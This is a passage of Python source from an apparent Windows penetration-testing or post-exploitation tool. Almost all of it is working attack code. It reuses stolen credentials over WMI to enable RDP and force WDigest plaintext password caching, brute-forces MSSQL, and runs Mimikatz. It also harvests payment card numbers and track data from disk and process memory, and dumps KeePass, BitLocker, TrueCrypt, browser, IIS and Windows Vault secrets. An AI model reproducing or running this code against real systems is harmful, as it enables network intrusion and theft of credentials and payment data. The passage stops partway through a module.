if tmpip in dcList:\n                                                dcCompromised=True\n                                            if tmpip in uncompromisedHostList:\n                                                uncompromisedHostList.remove(tmpip)\n                                        if optionTokenPriv==True:\n                                            if tmpip not in dcList and dcCompromised==False:\n                                                print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                                                tokensPriv(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                        if tmpip not in compromisedHostList:\n                                            compromisedHostList.append(tmpip)       \n\n\n                    if lastCount==len(uncompromisedHostList):\n                        complete1=True\n                    lastCount=len(uncompromisedHostList)\n\n\n        print (setColor(\"\\nList of Passwords in Database\", bold, color=\"green\"))\n        if len(userPassList)<1:\n            print \"No passwords found\"\n        else:\n            tmpuserPassList=userPassList\n            userPassList1=[]\n            for x in tmpuserPassList:\n                tmpip=x[0]\n                tmpdomain=(x[1]).lower()\n                tmpusername=(x[2]).lower()\n                tmppassword=x[3]\n                if len(tmpdomain)<1 or tmpdomain!=None:\n                    if [tmpip,tmpdomain,tmpusername,tmppassword] not in userPassList1:\n                        userPassList1.append([tmpip,tmpdomain,tmpusername,tmppassword])\n\n            print tabulate(userPassList1)\n            #analyzePasswords(userPassList)\n\n        print (setColor(\"\\nList of Hashes in Database\", bold, color=\"green\"))\n        if len(userHashList)<1:\n            print \"No hashes found\\n\"\n        else:\n            print tabulate(userHashList)\n            analyzeHashes1(userHashList)\n\n\n        if len(accessAdmHostList)>0:\n            print (setColor(\"Admin Access on the Below Hosts\", bold, color=\"green\"))\n            print tabulate(accessAdmHostList)\n\n        if len(uncompromisedHostList)>0:\n            print (setColor(\"List of Hosts Uncompromised\", bold, color=\"green\"))\n            for x in uncompromisedHostList:\n                print x\n        else:\n            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" All hosts have been compromised. Continuing with Post Exploitation modules\"                \n        complete=True\n    if args.module==\"rdp\":\n        if len(accessAdmHostList)>0:\n            print (setColor(\"\\n[*] Enabling RDP on Hosts that were not enabled\", bold, color=\"green\"))\n            if len(rdpList)==len(nbList):\n                print \"RDP has been enabled on all hosts\"\n            else:\n                dict={}        \n                for x in accessAdmHostList:\n                    ip=x[0]\n                    domain=x[1]\n                    username=x[2]\n                    password=x[3]\n                    if len(x[3])==65 and x[3].count(\":\")==1:\n                        passwordHash=x[3]\n                        password=None\n                    else:\n                        password=x[3]\n                        passwordHash=None\n                    if ip not in rdpList:\n                        print \"Enabling RDP on Host: \"+ip\n                        command=powershellCmdStart+\" -Command \\\"set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server'-name \\\"fDenyTSConnections\\\" -Value 0\\\"\"\n                        results,status=runWMIEXEC(ip, domain, username, password, passwordHash, command)  \n                        if debugMode==True:\n                            print results  \n                        command='netsh advfirewall firewall set rule name=\"Remote Desktop (TCP-In)\" new enable=Yes profile=domain'\n                        results,status=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n                        command='netsh advfirewall firewall set rule name=\"Remote Desktop - RemoteFX (TCP-In)\" new enable=Yes profile=domain'\n                        results,status=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n                        command='net start TermService'\n                        results,status=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n        os._exit(0)\n'''\nnm = nmap.PortScanner()\nfor ip in nbList:\n    nm.scan(ip, arguments='-O -A -sV -p 135,445')\n\n    nmapResults=str(nm[ip]['hostscript'][1]['output'])\n    if \"Windows 10\" in nmapResults:\n        print \"Windows 10 found\"\n        #print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+ip+\":445 [amsi]     | Enabling AMSI Bypass\"\n        passwordHash=None      \n        #dumpSAM(ip,domain,username,password,passwordHash)\n        runMimikatz(ip,domain,username,password,passwordHash)\n        os._exit(0)\n    if \"Windows 7\" in nmapResults:\n        print \"Windows 7 found\"\n\n\n        #print ip+\"\\t\"+nm[ip]['osmatch'][0]['osclass'][1]['cpe'][0]\nos._exit(1)\n\n'''\n\n\nif args.module=='files':\n    tmpResultList=[]\n    print (setColor(\"\\nSearching Drives for Interesting Files\", bold, color=\"green\"))\n    if len(accessAdmHostList)>0:\n        for x in accessAdmHostList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            tmpFileList=findInterestingFiles(ip,domain,username,password,passwordHash)\n            if len(tmpFileList)>0:\n                #print (setColor(\"[+]\", bold, color=\"green\"))+\" Downloading the files from host: \"+ip\n                count=0\n                for filename in tmpFileList:           \n                    filename=filename.strip()\n                    tmpFilename=(downloadFile(ip,domain,username,password,filename))\n                    if len(tmpFilename)>0:\n                        if count>0:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 | \"+(setColor(\"[download]\", bold, color=\"green\"))+\" | \"+filename+\" | \"+tmpFilename\n\n                        else:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 | \"+(setColor(\"[download]\", bold, color=\"green\"))+\" | \"+filename+\" | \"+tmpFilename\n                        if \"unattend.xml\" in filename.lower() or \"sysprep.xml\" in filename.lower():\n                            tmpResultList=parseUnattendXML(tmpFilename)\n                            if len(tmpResultList)>0:\n                                headers = [\"Username\",\"Password\"]\n                                print tabulate(tmpResultList,headers,tablefmt=\"simple\")\n                                print \"\\n\"\n                        if \"ultravnc.ini\" in filename.lower():\n                            tmpResultList=parseUltraVNC(tmpFilename)\n                            for x in tmpResultList:\n                                print \"Password1: \"+x[0]\n                                print \"Password2: \"+x[1]\n                        if \"sitemanager.xml\" in filename.lower():\n                            tmpResultList=parseSiteManagerXML(tmpFilename)\n                            headers = [\"Host\", \"Username\",\"Password\"]\n                            print tabulate(tmpResultList,headers,tablefmt=\"simple\")                    \n                        if \".txt\" in filename.lower():\n                            with open(tmpFilename) as f:\n                                lines = f.read().splitlines()\n                                count1=0\n                                if len(lines)<10:\n                                    for x in lines:\n                                        x=x.strip()\n                                        if count1<10:\n                                            print x\n                                    count1+=1\n                        count+=1\n\n    os._exit(0)    \nif args.module==\"mssqlshell\":\n    for x in mssqlList:\n        ip=x\n        username=args.username\n        password=args.password    \n        query=\"use master;EXEC sp_configure 'show advanced options','1';RECONFIGURE WITH OVERRIDE;EXEC sp_configure;\"\n        print query\n        tmpResultList=runSQLQuery(ip,username,password,query)\n        print tmpResultList\n        if len(tmpResultList)>0:\n            print tmpResultList\n            #tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | sa:\"+password+\" | \"+(setColor(\"[MSSQL] [Bruteforce|Found Account]\", bold, color=\"green\"))\n            #print tmpFooter\n\nif args.module=='wdigest':\n    for x in nbList:\n        targetIP=x\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[wdigest]\", color=\"green\"))+\" | Add UseLogonCredentials reg key\"              \n        cmd='reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f'\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n    os._exit(0)    \nif args.module=='mssqlauto':\n    for x in mssqlList:\n        ip=x\n        port=1433\n        bruteMSSQLAuto(ip, port)\n    os._exit(0)    \n\nif args.module=='mssqlbrute':\n    for x in mssqlList:\n        ip=x\n        port=1433\n        bruteMSSQL(ip, port)\n    os._exit(0)    \nif args.module=='mssqldata':\n    for x in mssqlList:\n        ip=x\n        port=1433\n        username=args.username\n        password=args.password\n        dumpMSSQLIDF(ip, port,username,password,domain)\n    os._exit(0)    \nif args.module=='mssqlhash':\n    for x in mssqlList:\n        ip=x\n        port=1433\n        username=args.username\n        password=args.password\n        dumpMSSQLHash(ip, port,username,password,domain)\n    os._exit(0)    \nif args.module==\"pan\":    \n    tmpResultList=[]\n    print (setColor(\"\\nSearching Drives for PAN Numbers\", bold, color=\"green\"))\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        if ip not in tmpDoneList:\n            tmpresults=diskCredDump(ip,domain,username,password,passwordHash)\n\t    results=tmpresults.split(\"\\n\")\n            tmpFilename=''\n            found=False\n            tmpCardNoList=[]\n            for x in results:\n                if len(x)>0:\n                    if found==True:\n                        x=x.strip() \n                        if len(x)<1:\n                            tmpResultList.append([ip,tmpFilename,tmpCardNoList])\n                            tmpCardNoList=[]\n                            found=False\n                        else:\n                            if \"----------------\" not in x:\n                                tmpCardNoList.append(x)\n                        #if \"---------------------\" not in x:\n                        #    tmpList1.append(x)\n                        #else:\n                        #    tmpResultList.append([tmpFilename,\" \".join(tmpList1)])   \n                        #    found=False\n                        #    tmpList1=[]\n                    if \"File: \" in x:\n                        x=x.replace(\"File: \",\"\")\n                        tmpFilename=x\n                        found=True        \n            tmpDoneList.append(ip)\n    if len(tmpResultList)>0:\n        #print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Possible PAN numbers found in the below locations\"\n        for x in tmpResultList:\n            tmpIP=x[0]\n            tmpFilename=x[1]\n            tmpCardNoList=x[2]\n            print setColor(\"[+]\", bold, color=\"green\")+\" \"+tmpIP+\":445 | \"+(setColor(\"[PAN] \", bold, color=\"green\"))+tmpFilename+\" | \"+\", \".join(tmpCardNoList)\n\n    #if len(tmpResultList)>0:\n    #    for x in tmpResultList:\n    #        print \"here: \"+str(x)\n    #    #print tabulate(tmpResultList,tablefmt=\"simple\")\n\n    if len(accessAdmHostList)>0:\n        print (setColor(\"\\nSearching Memory for PAN Numbers\", bold, color=\"green\"))\n        print \"[*] Processes Running on Hosts\"\n        dict={}        \n        for x in accessAdmHostList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            password=x[3]\n            passwordHash=None\n            tmpResultList=listProcesses(ip,domain, username, password,passwordHash)\n            tmpResultList1=[]\n\t    tmpResultList2=tmpResultList.split(\"\\n\")\n\t    for y in tmpResultList2:\n            \t#for y in str(tmpResultList):\n                if len(y)>0:\n\t\t    y = (y.split(\",\")[0]).replace('\"','')\n                    if [y,ip] not in tmpResultList1:\n                        tmpResultList1.append([y,ip])\n            for y in tmpResultList1:\n                try:\n                    tmpStr=dict[y[0]]\n                    tmpStr+=\", \"+y[1]\n                    dict[y[0]]=tmpStr\n                except KeyError:\n                    dict[y[0]]=y[1]    \n        tmpResultList2=[]      \n        tmpCount=1                                        \n        for key, value in dict.iteritems():\n            tmpResultList2.append([tmpCount,key,value])\n            tmpCount+=1\n\n        selectedOption=''    \n        selectedProcessList=[] \n        selectedProcess=''        \n        while len(selectedOption)<1:\n            print tabulate(tmpResultList2)   \n            print \"[*] Please enter a number or enter '*' to dump and search all processes:\"        \n            selectedOption=raw_input()\n        selectedHostList=[]\n        for x in tmpResultList2:  \n            if str(selectedOption)==str(x[0]) or str(selectedOption)==\"*\":                \n                selectedProcess=x[1]\n                selectedProcessList.append(x[1])\n                tmpSelectedHosts=x[2]\n                if \",\" in tmpSelectedHosts:\n                    tmpList1=tmpSelectedHosts.split(\",\")\n                    for g in tmpList1:\n                        g=g.strip()\n                        if g not in selectedHostList:\n                            selectedHostList.append(g)\n                else:\n                    if x[2] not in selectedHostList:\n                        selectedHostList.append(x[2])\n        if len(selectedHostList)>0:\n            for x in accessAdmHostList:\n                ip=x[0]\n                domain=x[1]\n                username=x[2]\n                password=x[3]\n                if ip in selectedHostList:\n                    for selectedProcess in selectedProcessList:\n                        print \"[*] Dumping Process '\"+selectedProcess+\"' on Host: \"+ip   \n                        tmpResultList=memCredDump(ip,domain,username,password,passwordHash,selectedProcess)\n                        if \"Access is denied\" not in str(tmpResultList):\n                            for y in tmpResultList:\n                                y=y.strip()\n                                if len(y)>0:\n                                    if \"CARD NUM:\" in y:\n                                        y=y.split(\"CARD NUM:\")[1]\n                                        y=y.strip()\n                                        if len(y):\n                                            if cardLuhnChecksumIsValid(y)==True:\n                                                print y\n                                    if \"TRACK DATA:\" in y:                                        \n                                        y=y.split(\"TRACK DATA:\")[1]\n                                        y=y.strip()\n                                        if len(y):\n                                            print y\n \t                   \tprint setColor(\"[*]\", bold, color=\"blue\")+\" \"+ip+\":445 | \"+(setColor(\"[PAN][Memory] \", bold, color=\"green\"))+\" | No PAN Numbers found\"\n        os._exit(1)\n\n\nif args.module=='shares':\n    #python ms14_068.py 172.16.126.0/24 -d corp -u milo -p Password1 -M shares -o host=172.16.126.176\n    svrFilterList=[]\n    if args.module_options:\n        if \"host=\" in args.module_options[0]:\n            tmpip=(args.module_options[0]).replace(\"host=\",\"\")\n            svrFilterList.append(tmpip)\n    if len(accessAdmHostList)>0:\n        tmpBlackList=[]\n        tmpBlackList.append(\"Application Data\")\n        tmpBlackList.append(\"Cookies\")\n        tmpBlackList.append(\"Local Settings\")\n        tmpBlackList.append(\"NetHood\")\n        tmpBlackList.append(\"PrintHood\")\n        tmpBlackList.append(\"Recent\")\n        tmpBlackList.append(\"Start Menu\")\n        tmpBlackList.append(\"Templates\")\n        tmpBlackList.append(\"SendTo\")\n        tmpBlackList.append(\"Videos\")\n        tmpBlackList.append(\"Pictures\")\n        tmpBlackList.append(\"Music\")\n        tmpBlackList.append(\"Saved Games\")\n        tmpBlackList.append(\"Searches\")\n        tmpBlackList.append(\"Links\")\n        tmpBlackList.append(\"Contacts\")\n        tmpBlackList.append(\"ProgramData\")\n        tmpBlackList.append(\"Program Files\")\n        tmpBlackList.append(\"Program Files (x86)\")\n        if args.module_options:\n            tmpFound=False\n            for x in accessAdmHostList:\n                tmpip=x[0]\n                if tmpip in svrFilterList:\n                    tmpFound=True\n            print (setColor(\"\\nTesting Access to Shared Folders\", bold, color=\"green\"))            \n            if tmpFound==False:\n                print \"No suitable hosts found\"\n        else:\n            print (setColor(\"\\nTesting Access to Shared Folders\", bold, color=\"green\"))            \n\n        for x in accessAdmHostList:            \n            headers = [\"IP\", \"Share/File\",\"Status\",\"Credentials\"]\n            tmpip=x[0]\n            tmpdomain=x[1]\n            tmpusername=x[2]\n            tmppassword=x[3]\n            try:\n                if len(svrFilterList)>0:\n                    if tmpip in svrFilterList:\n                        allowedList, deniedList=listRemoteShare(tmpip,tmpdomain, tmpusername, tmppassword)\n                else:\n                    allowedList, deniedList=listRemoteShare(tmpip,tmpdomain, tmpusername, tmppassword)\n                tmpOKList=[]\n                tmpFailedList=[]\n                tmpFailedList1=[]\n                tmpUserPassList=[]\n                credStr=tmpusername+\"|\"+tmppassword\n                if len(allowedList)>0:\n                    for x in allowedList:\n                        tmpFound=False\n                        for g in tmpBlackList:\n                            if g.lower() in x[3].lower():\n                                tmpFound=True\n                        if tmpFound==False:\n                            tmpOKList.append([x[0],str(x[3])[0:35],\"[OK]\",credStr])\n                if len(deniedList)>0:\n                    for x in deniedList:   \n                        tmpFound=False\n                        for z in tmpBlackList:\n                            if z in x[3]:\n                                tmpFound=True\n                        if tmpFound==False:\n                            tmpFailedList.append([x[0],str(x[3])[0:35],(setColor(\"[NOK]\", bold, color=\"red\"))])\n                tmpFailedList1=tmpFailedList\n                if [tmpip,tmpdomain,tmpusername,tmppassword] not in userPassList:\n                    userPassList.append([tmpip,tmpdomain,tmpusername,tmppassword])\n                for z in userPassList:\n                    for y in tmpFailedList:\n                        tmpIP=y[0]\n                        filePath=y[1]\n                        tmpdomain=(z[1]).lower()\n                        tmpusername=(z[2]).lower()\n                        tmppassword=z[3]\n                        if accessRemoteShare(tmpIP,filePath,tmpdomain, tmpusername, tmppassword)==True:\n                            tmpFailedList1.remove([tmpIP,filePath,(setColor(\"[NOK]\", bold, color=\"red\"))])\n                            tmpOKList.append([tmpIP,filePath,'[OK]',tmpusername+\"|\"+tmppassword])\n            except Exception as e:\n                print e\n                continue\n            tmpFailedList=tmpFailedList1\n            tmpFinalList=[]\n            for x in tmpOKList:\n                tmpFinalList.append([x[0],x[1],x[2],x[3]])\n            for x in tmpFailedList:\n                tmpFinalList.append([x[0],x[1],x[2],''])\n            print tabulate(tmpFinalList)\n\nif args.module=='reg':\n    #print (setColor(\"\\nFind Interesting Registry Keys\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=findInterestingRegKeys(ip,domain,username,password,passwordHash)\n        for y in results:    \n            if y not in tmpResultList:     \n                tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        for x in tmpResultList:\n            targetIP=x[0]\n            #tmpDomain=\"domain\"\n            #tmpUsername=\"milo\"\n            #tmpPassword=\"Password1\"\n            tmpRegPath=x[1]\n            tmpCred=x[2]\n            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445\"+\" | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[reg] \", color=\"green\"))+\"| \"+tmpRegPath+\" | \"+tmpCred\n            #(setColor(\" | \"+tmpRegPath, bold, color=\"green\"))                \n\n        #headers = [\"Host\",\"Reg Path\", \"Password/Hash\"]\n        #print tabulate(tmpResultList,headers)\n    os._exit(0)\n\nif args.module=='route':\n    if len(accessAdmHostList)>0:\n        print (setColor(\"\\n[*] Finding Network Routes\", bold, color=\"green\"))\n        dict={}        \n        for x in accessAdmHostList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            password=x[3]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            findRoute(ip,domain,username,password,passwordHash)\n    os._exit(0)\n\nif args.module=='keepass':\n    #print (setColor(\"\\nDumping Keepass Passwords\", bold, color=\"green\"))\n    tmpResultList=[]\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        if x[0] not in tmpDoneList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            results=getKeepass(ip,domain,username,password,passwordHash)\n            for y in results:\n                if len(y)>0:\n                    y=y.strip()\n                    if [ip,y] not in tmpResultList:\n                        tmpResultList.append([ip,y])\n            tmpDoneList.append(x[0])\n\n    if len(tmpResultList)>0:\n        #print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of Keepass databases and passwords found\"                \n        for x in tmpResultList:\n            targetIP=x[0]\n            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[keepass] \", bold, color=\"green\"))+\"| \"+x[1]\n    #else:\n    #    print \"No results found\"\n    os._exit(1)\n\nif args.module==\"vuln\":\n    from modules import ms08_067\n    from modules import ms17_010\n    ms08_067List=[]\n    for ip in nbList:\n        tmpResultList=ms08_067.check(ip)\n        if len(tmpResultList)>0:\n            for x in tmpResultList:\n                tmpIP=x[0]\n                tmpStatus=x[1]\n                if tmpStatus=='VULNERABLE':\n                    if tmpIP not in ms08_067List:\n                        ms08_067List.append(tmpIP)\n                    #print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+tmpIP+\":445 | \"+(setColor(\"[MS08-067]\", color=\"green\"))\n        result=ms17_010.check(ip)\n        if 'is likely VULNERABLE ' in result:\n            result=result.replace('[+] [','')\n            result=result.replace('(','')\n            result=result.replace(')','')\n            if ip not in ms08_067List:\n                result=result.replace('] is likely VULNERABLE to MS17-010!',':445 | '+(setColor(\"[MS17-010]\", color=\"green\")))\n            else:\n                result=result.replace('] is likely VULNERABLE to MS17-010!',':445 | '+(setColor(\"[MS08-067][MS17-010]\", color=\"green\")))                \n            print (setColor(\"[+] \", bold, color=\"green\"))+result\n    os._exit(1)\n\nif args.module=='mimikatz':\n    tmpResultList=[]\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        if x[0] not in tmpDoneList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            runMimikatz(ip,domain,username,password,passwordHash)\n    os._exit(1)\n\nif args.module=='tokens':\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n            tokensPriv(ip,domain,username,password,passwordHash)\n    os._exit(1)\n\nif args.module==\"bitlocker\":\n    print (setColor(\"\\nDumping Bitlocker Recovery Keys\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=getBitlockerKeys(ip,domain,username,password,passwordHash)\n        for y in results:\n            y=y.strip()\n            if len(y)>0:\n                tmpResultList.append([ip,y])\n    if len(tmpResultList)>0:\n        headers = [\"IP\",\"Bitlocker Keys\"]\n        print tabulate(tmpResultList,headers,tablefmt=\"simple\")\n    os._exit(1)\n\nif args.module=='truecrypt':\n    print (setColor(\"\\nDecrypting Truecrypt\", bold, color=\"green\"))\n    tmpResultList=[]\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        if x[0] not in tmpDoneList: \n            print \"[*] Targeting Host: \"+x[0]\n            tmpDoneList.append(x[0])\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            getTruecrypt(ip,domain,username,password,passwordHash)\n    os._exit(1)\n\nif args.module==\"passwords\":\n    print (setColor(\"\\nDumping PuTTY, WinSCP, Remote Desktop saved sessions, Filezilla, SuperPuTTY\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=sessionGopher(ip,domain,username,password,passwordHash)\n        #for y in results:\n        #    if len(y)>0:\n        #        tmpResultList.append(y)\n    #if len(tmpResultList)>0:\n    #    print tabulate(tmpResultList,tablefmt=\"simple\")\n    #else:\n    #    print \"No results found\"\n\n    print (setColor(\"\\nFind Interesting Registry Keys\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=findInterestingRegKeys(ip,domain,username,password,passwordHash)\n        for y in results:    \n            if y not in tmpResultList:     \n                tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        headers = [\"Host\",\"Reg Path\", \"Password/Hash\"]\n        print tabulate(tmpResultList,headers)\n\n    print (setColor(\"\\nFind Interesting Files\", bold, color=\"green\"))\n    tmpDoneList=[]\n    if len(accessAdmHostList)>0:\n        for x in accessAdmHostList:\n            if x[0] not in tmpDoneList:\n                ip=x[0]\n                domain=x[1]\n                username=x[2]\n                if len(x[3])==65 and x[3].count(\":\")==1:\n                    passwordHash=x[3]\n                    password=None\n                else:\n                    password=x[3]\n                    passwordHash=None\n                tmpFileList=findInterestingFiles(ip,domain,username,password,passwordHash)\n                if len(tmpFileList)>0:\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Downloading the files from host: \"+ip\n                    count=0\n                    for filename in tmpFileList:           \n                        filename=filename.strip()\n                        tmpFilename=(downloadFile(ip,domain,username,password,filename))\n                        if len(tmpFilename)>0:\n                            if count>0:\n                                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+filename+\" | \"+tmpFilename\n\n                            else:\n                                print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+filename+\" | \"+tmpFilename\n                            if \"unattend.xml\" in filename.lower() or \"sysprep.xml\" in filename.lower():\n                                tmpResultList=parseUnattendXML(tmpFilename)\n                                if len(tmpResultList)>0:\n                                    headers = [\"Username\",\"Password\"]\n                                    print tabulate(tmpResultList,headers,tablefmt=\"simple\")\n                                    print \"\\n\"\n                            if \"ultravnc.ini\" in filename.lower():\n                                tmpResultList=parseUltraVNC(tmpFilename)\n                                for x in tmpResultList:\n                                    print \"Password1: \"+x[0]\n                                    print \"Password2: \"+x[1]\n                            if \"sitemanager.xml\" in filename.lower():\n                                tmpResultList=parseSiteManagerXML(tmpFilename)\n                                headers = [\"Host\", \"Username\",\"Password\"]\n                                print tabulate(tmpResultList,headers,tablefmt=\"simple\")                    \n                            if \".txt\" in filename.lower():\n                                with open(tmpFilename) as f:\n                                    lines = f.read().splitlines()\n                                    count1=0\n                                    if len(lines)<10:\n                                        for x in lines:\n                                            x=x.strip()\n                                            if count1<10:\n                                                print x\n                                        count1+=1\n                            count+=1\n            tmpDoneList.append(x[0])\n\n    print (setColor(\"\\nDumping Bitlocker Recovery Keys\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=getBitlockerKeys(ip,domain,username,password,passwordHash)\n        for y in results:\n            y=y.strip()\n            if len(y)>0:\n                tmpResultList.append([ip,y])\n    if len(tmpResultList)>0:\n        headers = [\"IP\",\"Bitlocker Keys\"]\n        print tabulate(tmpResultList,headers,tablefmt=\"simple\")\n    #else:\n    #    print \"No results found\"\n\n    print (setColor(\"\\nDumping Keepass Passwords\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        ip=x[0]\n        domain=x[1]\n        username=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            passwordHash=x[3]\n            password=None\n        else:\n            password=x[3]\n            passwordHash=None\n        results=getKeepass(ip,domain,username,password,passwordHash)\n        for y in results:\n            if len(y)>0:\n                y=y.strip()\n                if [ip,y] not in tmpResultList:\n                    tmpResultList.append([ip,y])\n    if len(tmpResultList)>0:\n        print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of Keepass databases and passwords found\"                \n        for x in tmpResultList:\n            print x[0]+\"\\t\"+x[1]\n    else:\n        print \"No results found\"\n\n\n    print (setColor(\"\\nDumping Truecrypt Master Keys\", bold, color=\"green\"))\n    tmpResultList=[]\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        if x[0] not in tmpDoneList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            results=getTruecrypt(ip,domain,username,password,passwordHash)\n            tmpDoneList.append(x[0])\n\n    print (setColor(\"\\nDumping Browser Passwords\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        tmpip=x[0]\n        tmpdomain=x[1]\n        tmpusername=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            tmppasswordHash=x[3]\n            tmppassword=None\n        else:\n            tmppassword=x[3]\n            tmppasswordHash=None\n        results=dumpBrowser(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n        if len(results)>0:\n            for y in results:\n                if y not in tmpResultList:\n                    tmpResultList.append(y)\n    if len(tmpResultList)>0:\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n\n    print (setColor(\"\\nIIS Credentials\", bold, color=\"green\"))\n    tmpResultList=[]\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        if x[0] not in tmpDoneList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            results=dumpIIS(ip,domain,username,password,passwordHash)\n            for y in results:\n                tmpResultList.append(y)\n        tmpDoneList.append(x[0])\n    if len(tmpResultList)>0:\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n    #else:\n    #    print \"No results found\"\n\n    print setColor('\\nWindows Vault Credentials', bold, color='green')\n    tmpResultList=[]\n    tmpDoneList=[]\n    for x in accessAdmHostList:\n        if x[0] not in tmpDoneList:\n            ip=x[0]\n            domain=x[1]\n            username=x[2]\n            if len(x[3])==65 and x[3].count(\":\")==1:\n                passwordHash=x[3]\n                password=None\n            else:\n                password=x[3]\n                passwordHash=None\n            results=runDumpVault(ip,domain,username,password,passwordHash)\n            for y in results:\n                tmpResultList.append(y)\n        tmpDoneList.append(x[0])\n    if len(tmpResultList)>0:\n        print tabulate(tmpResultList,tablefmt=\"simple\")\n    else:\n        print \"No results found\"\n\nif args.module==\"apps\":\n    print (setColor(\"\\nList of Installed Programs\", bold, color=\"green\"))\n    tmpResultList=[]\n    for x in accessAdmHostList:\n        tmpip=x[0]\n        tmpdomain=x[1]\n        tmpusername=x[2]\n        if len(x[3])==65 and x[3].count(\":\")==1:\n            tmppasswordHash=x[3]\n            tmppassword=None\n        else:\n            tmppassword=x[3]\n            tmppasswordHash=None\n        